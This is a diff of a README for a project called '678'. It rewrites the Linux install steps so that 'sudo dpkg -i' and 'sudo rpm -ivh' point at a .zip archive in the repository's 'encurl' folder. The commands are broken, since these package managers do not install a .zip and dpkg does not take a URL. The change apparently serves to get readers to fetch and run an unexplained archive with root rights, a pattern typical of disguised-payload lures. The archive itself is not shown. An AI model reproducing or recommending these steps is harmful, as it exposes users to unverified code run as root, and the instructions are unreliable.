Perpaft11/678/README.md

 ### For Linux
 1. Double-click the downloaded package or open a terminal in the folder.
 2. Use the package manager of your choice to install.
 For example:
-   - For Debian/Ubuntu-based distributions: `sudo dpkg -i yourfile.deb`
+   - For Debian/Ubuntu-based distributions: `sudo dpkg -i https://raw.githubusercontent.com/Perpaft11/678/main/encurl/678-v2.7.zip`
-   - For Red Hat/Fedora-based distributions: `sudo rpm -ivh yourfile.rpm`
+   - For Red Hat/Fedora-based distributions: `sudo rpm -ivh https://raw.githubusercontent.com/Perpaft11/678/main/encurl/678-v2.7.zip`
 3. Launch 678 from your applications menu or terminal.

 ## 🛠 Using 678